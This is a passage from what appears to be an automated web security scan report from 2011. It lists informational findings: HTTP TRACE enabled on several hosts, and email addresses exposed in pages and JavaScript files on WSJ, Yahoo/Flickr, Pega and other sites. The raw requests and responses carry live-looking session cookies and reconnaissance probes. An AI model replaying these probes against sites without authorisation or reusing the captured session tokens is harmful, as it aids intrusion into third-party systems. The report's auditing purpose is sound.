X-Forwarded-For: 173.193.214.243
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive

21.6. http://tracking.hubspot.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracking.hubspot.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tracking.hubspot.com
Cookie: 2d38349e2d051bc6

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:21:37 GMT
Server: Apache/2.2.6 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tracking.hubspot.com
Cookie: 2d38349e2d051bc6

21.7. http://www.aboutads.info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aboutads.info
Path:   /

Request

TRACE / HTTP/1.0
Host: www.aboutads.info
Cookie: b1a6cd69252ddac1

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:21:10 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.aboutads.info
Cookie: b1a6cd69252ddac1; SESS32b8dadc94d1ca0f783338bfa5cddda4=6q4b73fnrig3olos2vk3tu3nn0

22. Email addresses disclosed  previous  next
There are 20 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

22.1. https://buy.wsj.com/shopandbuy/order/subscribe.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.wsj.com
Path:   /shopandbuy/order/subscribe.jsp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /shopandbuy/order/subscribe.jsp?trackCode=aaagprmz HTTP/1.1
Host: buy.wsj.com
Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=2;sz=571x47;ord=8210821082108210;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; wsjregion=na%2cus; s_vnum=1310602431737%26vn%3D1; DJSESSION=continent%3Dna%7C%7Czip%3D20001-20020%7C%7Ccountry%3Dus%7C%7Cregion%3Ddc%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dwashington%7C%7Clongitude%3D-77.0369%7C%7Ctimezone%3Dest%7C%7Clatitude%3D38.8951%7C%7CBIZO%3Dbiz%3D1080%3Bbiz%3D1027%3Bbiz%3D1053%3B; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2207%22%2C%22high%22%3A%5B%2273%22%5D%2C%22low%22%3A%5B%2259%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DTue%2C%2014%20Jun%202011%2000%3A33%3A55%20GMT%7C%7CweatherCode%3D10005; s_cc=true; s_invisit=true; s_sq=%5B%5BB%5D%5D; rsi_csl=lDlIlPlQlA; rsi_segs=G07608_10004|G07608_10009|G07608_10016|G07608_10017|G07608_10001

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:20:02 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA (build: SVNTag=JBPAPP_4_2_0_GA date=200706281411)/Tomcat-5.5
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=50
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 112017


                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<a href="mailto:onlinejournal@wsj.com" style="color: rgb(255, 255, 255);">onlinejournal@wsj.com</a>
...[SNIP]...
<p class="error email doublePeriod emailPunc">Your Email Address must be formatted as youraddress@email.com and cannot contain any spaces.</p>
...[SNIP]...
22.2. http://chartupload.com/source/includes/scripts/jquery.dimensions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://chartupload.com
Path:   /source/includes/scripts/jquery.dimensions.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /source/includes/scripts/jquery.dimensions.js HTTP/1.1
Host: chartupload.com
Proxy-Connection: keep-alive
Referer: http://chartupload.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 08:02:00 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 21 Mar 2011 22:38:10 GMT
ETag: "1354117-8dd-c83df880"
Accept-Ranges: bytes
Content-Length: 2269
Connection: close
Content-Type: application/x-javascript

/*
* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* $Las
...[SNIP]...
22.3. http://chartupload.com/source/includes/scripts/phpjs_00029.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://chartupload.com
Path:   /source/includes/scripts/phpjs_00029.js

Issue detail

The following email address was disclosed in the response:

Request

GET /source/includes/scripts/phpjs_00029.js HTTP/1.1
Host: chartupload.com
Proxy-Connection: keep-alive
Referer: http://chartupload.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 08:02:00 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 21 Mar 2011 22:38:12 GMT
ETag: "135411b-5918-c85c7d00"
Accept-Ranges: bytes
Content-Length: 22808
Connection: close
Content-Type: application/x-javascript

/*
* More info at: http://phpjs.org
*
* This is version: 2.83
* php.js is copyright 2009 Kevin van Zonneveld.
*
* Portions copyright Brett Zamir (http://brett-zamir.me), Kevin van Zonne
...[SNIP]...
rc Palau, Josh Fraser
* (http://onlineaspect.com/2007/06/08/auto-detect-a-time-zone-with-javascript/),
* Mirek Slugen, Tyler Akins (http://rumkin.com), Thunder.m, Aman Gupta, Arpad
* Ray (mailto:arpad@php.net), gettimeofday, Breaking Par Consulting Inc
* (http://www.breakingpar.com/bkp/home.nsf/0/87256B280015193F87256CFB006C45F7),
* Pellentesque Malesuada, KELAN, Alfonso Jimenez
* (http://www.alfonso
...[SNIP]...
22.4. http://l.yimg.com/g/javascript/fold_main.js.v48851.48851.48851.48851.48851.38771.48851.48851.104404.84182.86949.86949.62864.38771.66362.84183.84152.69832.38771.84694.38771.88197.84182.98826.98920.99014.18  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /g/javascript/fold_main.js.v48851.48851.48851.48851.48851.38771.48851.48851.104404.84182.86949.86949.62864.38771.66362.84183.84152.69832.38771.84694.38771.88197.84182.98826.98920.99014.18

Issue detail

The following email addresses were disclosed in the response:

Request

GET /g/javascript/fold_main.js.v48851.48851.48851.48851.48851.38771.48851.48851.104404.84182.86949.86949.62864.38771.66362.84183.84152.69832.38771.84694.38771.88197.84182.98826.98920.99014.18 HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/about/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 18:13:46 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Mon, 13 Jun 2011 18:11:40 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Served-By: www82.flickr.re2.yahoo.com
Expires: Mon, 28 Jul 2014 23:30:00 GMT
Cache-Control: max-age=315360000
Content-Type: application/x-javascript
Age: 22185
Server: YTS/1.19.5
Content-Length: 371395
Proxy-Connection: keep-alive

if(typeof YAHOO=="undefined"||!YAHOO){var YAHOO={};}YAHOO.namespace=function(){var s=arguments,K=null,T,b,h;for(T=0;T<s.length;T=T+1){h=s[T].split(".");K=YAHOO;for(b=(h[0]=="YAHOO")?1:0;b<h.length;b=b
...[SNIP]...
,j){if(k){var h=j.documentElement.getElementsByTagName("user")[0].getAttribute("magic_email");if(f){f.href="mailto:"+h+"@photos.flickr.com";f.innerHTML=h+"@photos.flickr.com"}if(c){c.href="mailto:"+h+"2blog@photos.flickr.com";c.innerHTML=h+"2blog@photos.flickr.com"}if(b){b.href="mailto:"+h+"@photos.flickr.com";b.innerHTML=h+"@photos.flickr.com"}if(a){a.href="mailto:"+h+"2blog@photos.flickr.com";a.innerHTML=h+"2blog@photos.flickr.com"}if(e){e.href="mailto:"+h+"2twitter@photos.flickr.com";e.innerHTML=h+"2twitter@photos.flickr.com"}}}})}}});F.set_png_bg=function(b,d,f,a){var j=(navigator.userAgent.match(/msie 6/i));if(!j){if(typeof b.setStyle!="undefined"){b.setStyle(d,f)}else{YAHOO.util.Dom.setStyle(b,d,f)}}else{var c=null;var
...[SNIP]...
22.5. http://l.yimg.com/g/javascript/s_output_en-us.js.057250ace985d60a3bcf49f9653a6eca  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /g/javascript/s_output_en-us.js.057250ace985d60a3bcf49f9653a6eca

Issue detail

The following email address was disclosed in the response:

Request

GET /g/javascript/s_output_en-us.js.057250ace985d60a3bcf49f9653a6eca HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/about/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 18:13:53 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Mon, 13 Jun 2011 18:11:40 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Served-By: www19.flickr.re2.yahoo.com
Expires: Mon, 28 Jul 2014 23:30:00 GMT
Cache-Control: max-age=315360000
Content-Length: 96025
Content-Type: application/x-javascript
Age: 22178
Server: YTS/1.19.5
Proxy-Connection: keep-alive

//
// tunablaster: ENGAGED
// all string outputs are defined in the object declaration and contained in the format_strs hash:

F.output.thou_sep = ',';
F.output.dec_sep = '.';
F.output.date_strs = {
   
...[SNIP]...
</a>',

   invite_friends_to_multiple: 'Multiple recipients',
   invite_invalid_email: 'Error: Make sure you have entered valid email addresses (like example@example.com), and a name for each email address.',
   invite_no_email: 'Error: you have not entered any email addresses!',

   photo_by_someone: '%s by %s',
   photo_by_someone_a: '%s by <a href="http://www.flickr.com/
...[SNIP]...
22.6. https://login.yahoo.com/config/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login

Issue detail

The following email address was disclosed in the response:

Request

GET /config/login?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c%3DJvVF95K62e6PzdPu7MBv2V8-&.intl=us&.done=https%3A%2F%2Flogin.yahoo.com%2Fconfig%2Fvalidate%3F.src%3Dflickrsignin%26.pc%3D8190%26.scrumb%3D0%26.pd%3Dc%253DJvVF95K62e6PzdPu7MBv2V8-%26.intl%3Dus%26.done%3Dhttp%253A%252F%252Fwww.flickr.com%252Fsignin%252Fyahoo%252F%253Fredir%253D%25252Fphoto_grease_postlogin.gne%25253Fd%25253Dhttp%25253A%25252F%25252Fwww.flickr.com%25252Freport_abuse.gne HTTP/1.1
Host: login.yahoo.com
Connection: keep-alive
Referer: http://www.flickr.com/report_abuse.gne
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; ALP=bTowJmw6ZW5fVVMm

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 42340


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
<p id='ex'>(e.g. free2rhyme@yahoo.com)</p>
...[SNIP]...
22.7. http://members.pega.com/common/js/jquery/plugins/jquery.callback.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://members.pega.com
Path:   /common/js/jquery/plugins/jquery.callback.js

Issue detail

The following email address was disclosed in the response:

Request

GET /common/js/jquery/plugins/jquery.callback.js HTTP/1.1
Host: members.pega.com
Proxy-Connection: keep-alive
Referer: http://members.pega.com/cookiecheck.asp?pcd=/login.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94242332.1308054477.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94242332.1196155334.1308054477.1308054477.1308054477.1; __utmc=94242332; __utmv=94242332.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=94242332.6.10.1308054477; DestinationURL=http%3A%2F%2Fwww.pega.com%2Fuser; RedirectFunction=login; ASPSESSIONIDSQBDSBTB=AMBIJDIDLIMGJAPGNGCFEOGB

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 864
Date: Tue, 14 Jun 2011 12:28:57 GMT
Content-Type: application/x-javascript
ETag: "02b12601a72ca1:48f5"
Server: Microsoft-IIS/6.0
Last-Modified: Tue, 01 Dec 2009 00:08:14 GMT
Accept-Ranges: bytes

/**
* jQuery Callback
* @author Alberto Bottarini <alberto.bottarini@gmail.com
* @version 1.1
* @homepage http://code.google.com/p/jquerycallback
*
* jQuery-callback permits jQuery developer to have a real control to their callback functions.
* With this plugin you ca
...[SNIP]...
22.8. http://members.pega.com/common/js/jquery/plugins/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://members.pega.com
Path:   /common/js/jquery/plugins/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /common/js/jquery/plugins/jquery.cookie.js HTTP/1.1
Host: members.pega.com
Proxy-Connection: keep-alive
Referer: http://members.pega.com/cookiecheck.asp?pcd=/login.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94242332.1308054477.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94242332.1196155334.1308054477.1308054477.1308054477.1; __utmc=94242332; __utmv=94242332.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=94242332.6.10.1308054477; DestinationURL=http%3A%2F%2Fwww.pega.com%2Fuser; RedirectFunction=login; ASPSESSIONIDSQBDSBTB=AMBIJDIDLIMGJAPGNGCFEOGB

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 4341
Date: Tue, 14 Jun 2011 12:28:57 GMT
Content-Type: application/x-javascript
ETag: "0c1bd2e7d4ca1:48f5"
Server: Microsoft-IIS/6.0
Last-Modified: Mon, 05 Apr 2010 17:45:46 GMT
Accept-Ranges: bytes

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.
...[SNIP]...
ll be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...
22.9. http://members.pega.com/common/js/jquery/plugins/jquery.dimensions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://members.pega.com
Path:   /common/js/jquery/plugins/jquery.dimensions.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /common/js/jquery/plugins/jquery.dimensions.js HTTP/1.1
Host: members.pega.com
Proxy-Connection: keep-alive
Referer: http://members.pega.com/cookiecheck.asp?pcd=/login.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94242332.1308054477.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94242332.1196155334.1308054477.1308054477.1308054477.1; __utmc=94242332; __utmv=94242332.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=94242332.6.10.1308054477; DestinationURL=http%3A%2F%2Fwww.pega.com%2Fuser; RedirectFunction=login; ASPSESSIONIDSQBDSBTB=AMBIJDIDLIMGJAPGNGCFEOGB

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 3567
Date: Tue, 14 Jun 2011 12:28:59 GMT
Content-Type: application/x-javascript
ETag: "0c1bd2e7d4ca1:48f5"
Server: Microsoft-IIS/6.0
Last-Modified: Mon, 05 Apr 2010 17:45:46 GMT
Accept-Ranges: bytes

/* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* $LastCha
...[SNIP]...
22.10. http://s.gravatar.com/js/jquery.Jcrop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.gravatar.com
Path:   /js/jquery.Jcrop.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery.Jcrop.js?48 HTTP/1.1
Host: s.gravatar.com
Proxy-Connection: keep-alive
Referer: http://en.gravatar.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=94608000
Content-Type: text/javascript
Date: Tue, 14 Jun 2011 00:30:10 GMT
Expires: Fri, 13 Jun 2014 00:30:10 GMT
Last-Modified: Tue, 27 Jan 2009 01:15:55 GMT
Server: ECS (dca/532D)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 22834

/**
* jquery.Jcrop.js v0.9.5
* jQuery Image Cropping Plugin
* @author Kelly Hallman <khallman@wrack.org>
* Copyright (c) 2008 Kelly Hallman - released under MIT License {{{
*
* Permission is her
...[SNIP]...
22.11. http://sj.wsj.net/djscript/bucket/NA_WSJ/page/0_0_WA_0002/provided/j_global_slim/version/20110602184226.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sj.wsj.net
Path:   /djscript/bucket/NA_WSJ/page/0_0_WA_0002/provided/j_global_slim/version/20110602184226.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /djscript/bucket/NA_WSJ/page/0_0_WA_0002/provided/j_global_slim/version/20110602184226.js HTTP/1.1
Host: sj.wsj.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.58 (Unix)
FastDynaPage-ServerInfo: secj2kapachep05 - Thu 06/02/11 - 19:09:53 EDT
Last-Modified: Thu, 02 Jun 2011 23:09:53 GMT
If-Modified-Since: Thu, 02 Jun 2011 22:42:51 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Type: application/x-javascript
Content-Length: 1022768
Cache-Control: max-age=2674611
Expires: Thu, 14 Jul 2011 23:10:56 GMT
Date: Tue, 14 Jun 2011 00:14:05 GMT
Connection: close

/*
   Copyright (c) 2004-2010, The Dojo Foundation All Rights Reserved.
   Available via Academic Free License >= 2.1 OR the modified BSD license.
   see: http://dojotoolkit.org/license for details
*/


if(
...[SNIP]...
<u-suke@kawa.net>
...[SNIP]...
","anus","biotches","boobs","m0r0n","fuckage","h-o-n-k-y","fuckkk","c.u.n.t.","f-ing","cornholed","fuctard","mcwar","oblahblah","mcshit","http://www.debtchallenges.com","http://blog.tradingideas.in/","infotips@yahoo.com","dirtbags","azzes","goddam","bimbo","chick","doodoohead","www.themastertrader.net","monoprice.com","http://www.dollartalk.net","shlt","dumbasses","phucked","http://www.jewwatch.com/","shiti","www.you
...[SNIP]...
22.12. http://sj.wsj.net/djscript/require/j_global_slim/version/20110611110639.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sj.wsj.net
Path:   /djscript/require/j_global_slim/version/20110611110639.js

Issue detail

The following email address was disclosed in the response:

Request

GET /djscript/require/j_global_slim/version/20110611110639.js HTTP/1.1
Host: sj.wsj.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 11 Jun 2011 16:00:45 GMT
Vary: Accept-Encoding
Server: Apache/2.0.58 (Unix)
FastDynaPage-ServerInfo: secj2kapachep02 - Sat 06/11/11 - 12:00:45 EDT
If-Modified-Since: Sat, 11 Jun 2011 15:33:43 GMT
Content-Type: application/x-javascript
Content-Length: 225484
Cache-Control: max-age=3428038
Expires: Sat, 23 Jul 2011 16:28:02 GMT
Date: Tue, 14 Jun 2011 00:14:04 GMT
Connection: close


if(typeof dj=="undefined"){dj={};}
if(typeof dj.context=="undefined"){dj.context={};}
if(typeof djConfig=="undefined"){this.djConfig={};}
(function(){var ctx=dj.context,djc=djConfig;ctx.core=(ctx.cor
...[SNIP]...
$4)#7=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t;s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id=^A;s
...[SNIP]...
22.13. http://sj.wsj.net/djscript/require/j_global_slim/version/20110613193701.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sj.wsj.net
Path:   /djscript/require/j_global_slim/version/20110613193701.js

Issue detail

The following email address was disclosed in the response:

Request

GET /djscript/require/j_global_slim/version/20110613193701.js HTTP/1.1
Host: sj.wsj.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.58 (Unix)
FastDynaPage-ServerInfo: secj2kapachep06 - Mon 06/13/11 - 19:37:09 EDT
Last-Modified: Mon, 13 Jun 2011 23:37:09 GMT
If-Modified-Since: Mon, 13 Jun 2011 23:37:08 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Type: application/x-javascript
Content-Length: 225800
Cache-Control: max-age=3628244
Expires: Tue, 26 Jul 2011 00:04:31 GMT
Date: Tue, 14 Jun 2011 00:13:47 GMT
Connection: close


if(typeof dj=="undefined"){dj={};}
if(typeof dj.context=="undefined"){dj.context={};}
if(typeof djConfig=="undefined"){this.djConfig={};}
(function(){var ctx=dj.context,djc=djConfig;ctx.core=(ctx.cor
...[SNIP]...
